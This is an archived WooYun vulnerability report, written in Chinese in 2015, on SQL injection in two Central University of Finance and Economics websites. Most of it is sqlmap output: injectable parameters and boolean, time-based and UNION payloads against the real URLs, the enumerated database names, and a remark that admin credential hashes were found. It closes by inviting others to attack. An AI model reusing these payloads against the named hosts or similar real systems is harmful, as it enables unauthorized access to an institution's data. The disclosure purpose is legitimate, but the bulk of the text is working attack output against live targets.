乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-24: 细节已通知厂商并且等待厂商处理中 2015-03-29: 厂商已经主动忽略漏洞,细节向公众公开
RT,挺多表,跑着好慢就没跑了
中央财经大学就业网:http://scc.cufe.edu.cn/jyw_zc/detail.jsp?seq=2310
sqlmap:---Place: GETParameter: seq Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: seq=2310' AND 2927=2927 AND 'cLEy'='cLEy Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: seq=2310' AND 9752=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(114)||CHR(66)||CHR(109),5) AND 'tVAQ'='tVAQ---[web application technology: JSP, Apache 2.0.59back-end DBMS: Oracle
数据库:available databases [19]:[*] BKZSW[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] JYZXGL[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB[*] XSCWZ[*] XSXT
中央财经大学商学院:http://bsen.cufe.edu.cn/news.aspx?id=12&type=2 注入参数id=12
sqlmap---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=12 AND 2268=2268&type=2 Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: id=-1666 UNION ALL SELECT 42,CHAR(113)+CHAR(114)+CHAR(115)+CHAR(114)+CHAR(113)+CHAR(104)+CHAR(107)+CHAR(89)+CHAR(120)+CHAR(86)+CHAR(71)+CHAR(120)+CHAR(107)+CHAR(81)+CHAR(87)+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(114)+CHAR(113),42,42,42,42,42,42,42-- &type=2---web server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008
数据库:available databases [7]: [*] db_cufeIT[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb
这个账号密码后台都找到了,16位MD5加密没解出来,就懒得等结果了,不进后台了
已证明!
你们来吧
危害等级:无影响厂商忽略
忽略时间:2015-03-29 11:58
暂无